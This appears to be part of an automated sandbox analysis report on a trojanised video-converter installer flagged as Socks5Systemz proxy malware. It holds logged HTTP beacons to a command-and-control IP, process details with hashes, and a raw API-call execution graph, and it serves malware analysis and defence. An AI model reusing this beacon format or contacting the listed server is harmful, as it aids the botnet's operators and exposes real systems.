2024-12-16 12:44:28 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 49967 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:29 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:30 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:30 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 49973 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:32 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:32 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:32 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 49979 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:34 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:35 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:35 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.9 | 49985 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:36 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:37 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:37 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.9 | 49994 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:39 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:39 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:39 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.9 | 50000 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:41 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:42 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:42 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID: 25 | Source IP: 192.168.2.9 | Source Port: 50002 | Destination IP: 188.119.66.185 | Destination Port: 443 | PID: 7880 | Process: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:43 UTC | 291 bytes | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-16 12:44:44 UTC | 200 bytes | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 16 Dec 2024 12:44:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-16 12:44:44 UTC | 24 bytes | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID: 26 | Source IP: 192.168.2.9 | Source Port: 50003 | Destination IP: 188.119.66.185 | Destination Port: 443 | PID: 7880 | Process: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:46 UTC | 291 bytes | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-16 12:44:46 UTC | 200 bytes | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 16 Dec 2024 12:44:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-16 12:44:46 UTC | 24 bytes | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID: 27 | Source IP: 192.168.2.9 | Source Port: 50004 | Destination IP: 188.119.66.185 | Destination Port: 443 | PID: 7880 | Process: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:48 UTC | 291 bytes | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-16 12:44:49 UTC | 200 bytes | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 16 Dec 2024 12:44:48 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-16 12:44:49 UTC | 24 bytes | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID: 28 | Source IP: 192.168.2.9 | Source Port: 50005 | Destination IP: 188.119.66.185 | Destination Port: 443 | PID: 7880 | Process: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:50 UTC | 291 bytes | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-16 12:44:51 UTC | 200 bytes | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 16 Dec 2024 12:44:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-16 12:44:51 UTC | 24 bytes | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250



                                                                                                    Target ID:0
                                                                                                    Start time:07:42:44
                                                                                                    Start date:16/12/2024
                                                                                                    Path:C:\Users\user\Desktop\Oz2UhFBTHy.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\Oz2UhFBTHy.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:3'918'263 bytes
                                                                                                    MD5 hash:667621F07A3DE153960AF063462B20FE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:2
                                                                                                    Start time:07:42:44
                                                                                                    Start date:16/12/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp" /SL5="$10434,3669199,56832,C:\Users\user\Desktop\Oz2UhFBTHy.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:706'560 bytes
                                                                                                    MD5 hash:9D6E5DF4EF5AD8914D4A482A3BC8BB55
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:3
                                                                                                    Start time:07:42:46
                                                                                                    Start date:16/12/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe" -i
                                                                                                    Imagebase:0x400000
                                                                                                    File size:3'099'386 bytes
                                                                                                    MD5 hash:044E781B9914BD4A3851BF6BA7D7C9D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1372320071.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2631419296.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:21.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:2.4%
                                                                                                      Total number of Nodes:1520
                                                                                                      Total number of Limit Nodes:22
execution_graph: serialized node/edge listing of the interactive execution graph (function addresses, API call counts and edges) not reproduced here; node totals are given above.
6479->6480 6481 4028f4 6480->6481 6839 4019d3 6840 4019ba 6839->6840 6841 4019c3 RtlLeaveCriticalSection 6840->6841 6842 4019cd 6840->6842 6841->6842 5402 407fd4 5403 407fe6 5402->5403 5405 407fed 5402->5405 5413 407f10 5403->5413 5406 408021 5405->5406 5407 408015 5405->5407 5408 408017 5405->5408 5409 40804e 5406->5409 5411 407d7c 33 API calls 5406->5411 5427 407e2c 5407->5427 5424 407d7c 5408->5424 5411->5409 5414 407f25 5413->5414 5415 407d7c 33 API calls 5414->5415 5416 407f34 5414->5416 5415->5416 5417 407f6e 5416->5417 5419 407d7c 33 API calls 5416->5419 5418 407f82 5417->5418 5420 407d7c 33 API calls 5417->5420 5423 407fae 5418->5423 5434 407eb8 5418->5434 5419->5417 5420->5418 5423->5405 5437 4058c4 5424->5437 5426 407d9e 5426->5406 5428 405194 33 API calls 5427->5428 5429 407e57 5428->5429 5445 407de4 5429->5445 5431 407e5f 5432 403198 4 API calls 5431->5432 5433 407e74 5432->5433 5433->5406 5435 407ec7 VirtualFree 5434->5435 5436 407ed9 VirtualAlloc 5434->5436 5435->5436 5436->5423 5439 4058d0 5437->5439 5438 405194 33 API calls 5440 4058fd 5438->5440 5439->5438 5441 4031e8 18 API calls 5440->5441 5442 405908 5441->5442 5443 403198 4 API calls 5442->5443 5444 40591d 5443->5444 5444->5426 5446 4058c4 33 API calls 5445->5446 5447 407e06 5446->5447 5447->5431 6482 405ad4 6483 405ae4 6482->6483 6484 405adc 6482->6484 6485 405ae2 6484->6485 6486 405aeb 6484->6486 6489 405a4c 6485->6489 6487 405940 19 API calls 6486->6487 6487->6483 6490 405a54 6489->6490 6491 405a6e 6490->6491 6492 403154 4 API calls 6490->6492 6493 405a73 6491->6493 6494 405a8a 6491->6494 6492->6490 6495 405940 19 API calls 6493->6495 6496 403154 4 API calls 6494->6496 6497 405a86 6495->6497 6498 405a8f 6496->6498 6500 403154 4 API calls 6497->6500 6499 4059b0 33 API calls 6498->6499 6499->6497 6501 405ab8 6500->6501 6502 403154 4 API calls 6501->6502 6503 405ac6 6502->6503 6503->6483 5915 40a9de 5916 40aa03 5915->5916 5917 407918 InterlockedExchange 5916->5917 5918 40aa2d 5917->5918 5919 
40aa3d 5918->5919 5920 409ae8 18 API calls 5918->5920 5925 4076ac SetEndOfFile 5919->5925 5920->5919 5922 40aa59 5923 4025ac 4 API calls 5922->5923 5924 40aa90 5923->5924 5926 4076c3 5925->5926 5927 4076bc 5925->5927 5926->5922 5928 40748c 35 API calls 5927->5928 5928->5926 6846 402be9 RaiseException 6847 402c04 6846->6847 6514 402af2 6515 402afe 6514->6515 6518 402ed0 6515->6518 6519 403154 4 API calls 6518->6519 6521 402ee0 6519->6521 6520 402b03 6521->6520 6523 402b0c 6521->6523 6524 402b25 6523->6524 6525 402b15 RaiseException 6523->6525 6524->6520 6525->6524 5453 40a5f8 5496 4030dc 5453->5496 5455 40a60e 5499 4042e8 5455->5499 5457 40a613 5502 40457c GetModuleHandleA GetProcAddress 5457->5502 5461 40a61d 5510 4065c8 5461->5510 5463 40a622 5519 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5463->5519 5470 40a665 5541 406c2c 5470->5541 5474 4031e8 18 API calls 5475 40a683 5474->5475 5555 4074e0 5475->5555 5480 407918 InterlockedExchange 5483 40a6d2 5480->5483 5482 40a710 5575 4074a0 5482->5575 5483->5482 5612 409ae8 5483->5612 5485 40a751 5579 407a28 5485->5579 5486 40a736 5486->5485 5487 409ae8 18 API calls 5486->5487 5487->5485 5489 40a776 5589 408b08 5489->5589 5493 40a7bc 5494 408b08 35 API calls 5493->5494 5495 40a7f5 5493->5495 5494->5493 5622 403094 5496->5622 5498 4030e1 GetModuleHandleA GetCommandLineA 5498->5455 5500 403154 4 API calls 5499->5500 5501 404323 5499->5501 5500->5501 5501->5457 5503 404598 5502->5503 5504 40459f GetProcAddress 5502->5504 5503->5504 5505 4045b5 GetProcAddress 5504->5505 5506 4045ae 5504->5506 5507 4045c4 SetProcessDEPPolicy 5505->5507 5508 4045c8 5505->5508 5506->5505 5507->5508 5509 404624 6FB81CD0 5508->5509 5509->5461 5623 405ca8 5510->5623 5520 4090f7 5519->5520 5707 406fa0 SetErrorMode 5520->5707 5523 407284 19 API calls 5524 409127 5523->5524 5525 403198 4 API calls 5524->5525 5526 40913c 5525->5526 5527 409b78 GetSystemInfo VirtualQuery 5526->5527 5528 409ba2 5527->5528 5529 409c2c 5527->5529 
5528->5529 5530 409c0d VirtualQuery 5528->5530 5531 409bcc VirtualProtect 5528->5531 5532 409bfb VirtualProtect 5528->5532 5533 409768 5529->5533 5530->5528 5530->5529 5531->5528 5532->5530 5713 406bd0 GetCommandLineA 5533->5713 5535 409850 5536 4031b8 4 API calls 5535->5536 5538 40986a 5536->5538 5537 406c2c 20 API calls 5540 409785 5537->5540 5538->5470 5605 409c88 5538->5605 5539 403454 18 API calls 5539->5540 5540->5535 5540->5537 5540->5539 5542 406c53 GetModuleFileNameA 5541->5542 5543 406c77 GetCommandLineA 5541->5543 5544 403278 18 API calls 5542->5544 5551 406c7c 5543->5551 5545 406c75 5544->5545 5549 406ca4 5545->5549 5546 406c81 5547 403198 4 API calls 5546->5547 5550 406c89 5547->5550 5548 406af0 18 API calls 5548->5551 5552 403198 4 API calls 5549->5552 5553 40322c 4 API calls 5550->5553 5551->5546 5551->5548 5551->5550 5554 406cb9 5552->5554 5553->5549 5554->5474 5556 4074ea 5555->5556 5720 407576 5556->5720 5723 407578 5556->5723 5557 407516 5558 40752a 5557->5558 5559 40748c 35 API calls 5557->5559 5562 409c34 FindResourceA 5558->5562 5559->5558 5563 409c49 5562->5563 5564 409c4e SizeofResource 5562->5564 5565 409ae8 18 API calls 5563->5565 5566 409c60 LoadResource 5564->5566 5567 409c5b 5564->5567 5565->5564 5569 409c73 LockResource 5566->5569 5570 409c6e 5566->5570 5568 409ae8 18 API calls 5567->5568 5568->5566 5572 409c84 5569->5572 5573 409c7f 5569->5573 5571 409ae8 18 API calls 5570->5571 5571->5569 5572->5480 5572->5483 5574 409ae8 18 API calls 5573->5574 5574->5572 5577 4074b4 5575->5577 5576 4074c4 5576->5486 5577->5576 5578 4073ec 34 API calls 5577->5578 5578->5576 5580 407a35 5579->5580 5581 405890 18 API calls 5580->5581 5582 407a89 5580->5582 5581->5582 5583 407918 InterlockedExchange 5582->5583 5584 407a9b 5583->5584 5585 405890 18 API calls 5584->5585 5586 407ab1 5584->5586 5585->5586 5587 405890 18 API calls 5586->5587 5588 407af4 5586->5588 5587->5588 5588->5489 5591 408b39 5589->5591 5595 408b82 5589->5595 5590 408bcd 5726 407cb8 
5590->5726 5593 4034f0 18 API calls 5591->5593 5591->5595 5598 403420 18 API calls 5591->5598 5599 4031e8 18 API calls 5591->5599 5603 407cb8 35 API calls 5591->5603 5593->5591 5594 408be4 5597 4031b8 4 API calls 5594->5597 5595->5590 5596 4034f0 18 API calls 5595->5596 5601 403420 18 API calls 5595->5601 5602 4031e8 18 API calls 5595->5602 5604 407cb8 35 API calls 5595->5604 5596->5595 5600 408bfe 5597->5600 5598->5591 5599->5591 5619 404c20 5600->5619 5601->5595 5602->5595 5603->5591 5604->5595 5606 40322c 4 API calls 5605->5606 5607 409cab 5606->5607 5608 409cba MessageBoxA 5607->5608 5609 409ccf 5608->5609 5610 403198 4 API calls 5609->5610 5611 409cd7 5610->5611 5611->5470 5613 409af1 5612->5613 5614 409b09 5612->5614 5616 405890 18 API calls 5613->5616 5615 405890 18 API calls 5614->5615 5617 409b1a 5615->5617 5618 409b03 5616->5618 5617->5482 5618->5482 5748 402594 5619->5748 5621 404c2b 5621->5493 5622->5498 5624 405940 19 API calls 5623->5624 5625 405cb9 5624->5625 5626 405280 GetSystemDefaultLCID 5625->5626 5630 4052b6 5626->5630 5627 404cdc 19 API calls 5627->5630 5628 40520c 19 API calls 5628->5630 5629 4031e8 18 API calls 5629->5630 5630->5627 5630->5628 5630->5629 5631 405318 5630->5631 5632 404cdc 19 API calls 5631->5632 5633 40520c 19 API calls 5631->5633 5634 4031e8 18 API calls 5631->5634 5635 40539b 5631->5635 5632->5631 5633->5631 5634->5631 5636 4031b8 4 API calls 5635->5636 5637 4053b5 5636->5637 5638 4053c4 GetSystemDefaultLCID 5637->5638 5695 40520c GetLocaleInfoA 5638->5695 5641 4031e8 18 API calls 5642 405404 5641->5642 5643 40520c 19 API calls 5642->5643 5644 405419 5643->5644 5645 40520c 19 API calls 5644->5645 5646 40543d 5645->5646 5701 405258 GetLocaleInfoA 5646->5701 5649 405258 GetLocaleInfoA 5650 40546d 5649->5650 5651 40520c 19 API calls 5650->5651 5652 405487 5651->5652 5653 405258 GetLocaleInfoA 5652->5653 5654 4054a4 5653->5654 5655 40520c 19 API calls 5654->5655 5656 4054be 5655->5656 5657 4031e8 18 API calls 5656->5657 5658 
4054cb 5657->5658 5659 40520c 19 API calls 5658->5659 5660 4054e0 5659->5660 5661 4031e8 18 API calls 5660->5661 5662 4054ed 5661->5662 5663 405258 GetLocaleInfoA 5662->5663 5664 4054fb 5663->5664 5665 40520c 19 API calls 5664->5665 5666 405515 5665->5666 5667 4031e8 18 API calls 5666->5667 5668 405522 5667->5668 5669 40520c 19 API calls 5668->5669 5670 405537 5669->5670 5671 4031e8 18 API calls 5670->5671 5672 405544 5671->5672 5673 40520c 19 API calls 5672->5673 5674 405559 5673->5674 5675 405576 5674->5675 5676 405567 5674->5676 5678 40322c 4 API calls 5675->5678 5703 40322c 5676->5703 5679 405574 5678->5679 5680 40520c 19 API calls 5679->5680 5681 405598 5680->5681 5682 4055b5 5681->5682 5683 4055a6 5681->5683 5685 403198 4 API calls 5682->5685 5684 40322c 4 API calls 5683->5684 5686 4055b3 5684->5686 5685->5686 5687 4033b4 18 API calls 5686->5687 5688 4055d7 5687->5688 5689 4033b4 18 API calls 5688->5689 5690 4055f1 5689->5690 5691 4031b8 4 API calls 5690->5691 5692 40560b 5691->5692 5693 405cf4 GetVersionExA 5692->5693 5694 405d0b 5693->5694 5694->5463 5696 405233 5695->5696 5697 405245 5695->5697 5698 403278 18 API calls 5696->5698 5699 40322c 4 API calls 5697->5699 5700 405243 5698->5700 5699->5700 5700->5641 5702 405274 5701->5702 5702->5649 5705 403230 5703->5705 5704 403252 5704->5679 5705->5704 5706 4025ac 4 API calls 5705->5706 5706->5704 5711 403414 5707->5711 5710 406fee 5710->5523 5712 403418 LoadLibraryA 5711->5712 5712->5710 5714 406af0 18 API calls 5713->5714 5715 406bf3 5714->5715 5716 406af0 18 API calls 5715->5716 5717 406c05 5715->5717 5716->5715 5718 403198 4 API calls 5717->5718 5719 406c1a 5718->5719 5719->5540 5721 407578 5720->5721 5722 4075b7 CreateFileA 5721->5722 5722->5557 5724 403414 5723->5724 5725 4075b7 CreateFileA 5724->5725 5725->5557 5727 407cd3 5726->5727 5731 407cc8 5726->5731 5732 407c5c 5727->5732 5730 405890 18 API calls 5730->5731 5731->5594 5733 407c70 5732->5733 5734 407caf 5732->5734 5733->5734 5736 407bac 5733->5736 
5734->5730 5734->5731 5737 407bb7 5736->5737 5738 407bc8 5736->5738 5739 405890 18 API calls 5737->5739 5740 4074a0 34 API calls 5738->5740 5739->5738 5741 407bdc 5740->5741 5742 4074a0 34 API calls 5741->5742 5743 407bfd 5742->5743 5744 407918 InterlockedExchange 5743->5744 5745 407c12 5744->5745 5746 407c28 5745->5746 5747 405890 18 API calls 5745->5747 5746->5733 5747->5746 5749 402598 5748->5749 5751 4025a2 5748->5751 5754 401fd4 5749->5754 5750 40259e 5750->5751 5752 403154 4 API calls 5750->5752 5751->5621 5751->5751 5752->5751 5755 401fe8 5754->5755 5756 401fed 5754->5756 5765 401918 RtlInitializeCriticalSection 5755->5765 5758 402012 RtlEnterCriticalSection 5756->5758 5759 40201c 5756->5759 5762 401ff1 5756->5762 5758->5759 5759->5762 5772 401ee0 5759->5772 5762->5750 5763 402147 5763->5750 5764 40213d RtlLeaveCriticalSection 5764->5763 5766 40193c RtlEnterCriticalSection 5765->5766 5767 401946 5765->5767 5766->5767 5768 401964 LocalAlloc 5767->5768 5769 40197e 5768->5769 5770 4019c3 RtlLeaveCriticalSection 5769->5770 5771 4019cd 5769->5771 5770->5771 5771->5756 5775 401ef0 5772->5775 5773 401f1c 5776 401f40 5773->5776 5783 401d00 5773->5783 5775->5773 5775->5776 5778 401e58 5775->5778 5776->5763 5776->5764 5787 4016d8 5778->5787 5781 401e75 5781->5775 5784 401d4e 5783->5784 5785 401d1e 5783->5785 5784->5785 5856 401c68 5784->5856 5785->5776 5790 4016f4 5787->5790 5789 4016fe 5812 4015c4 5789->5812 5790->5789 5794 40174f 5790->5794 5796 40175b 5790->5796 5804 401430 5790->5804 5816 40132c 5790->5816 5793 40170a 5793->5796 5820 40150c 5794->5820 5796->5781 5797 401dcc 5796->5797 5830 401d80 5797->5830 5800 40132c LocalAlloc 5801 401df0 5800->5801 5802 401df8 5801->5802 5834 401b44 5801->5834 5802->5781 5805 40143f VirtualAlloc 5804->5805 5807 40146c 5805->5807 5808 40148f 5805->5808 5824 4012e4 5807->5824 5808->5790 5811 40147c VirtualFree 5811->5808 5814 40160a 5812->5814 5813 40163a 5813->5793 5814->5813 5815 401626 VirtualAlloc 5814->5815 5815->5813 
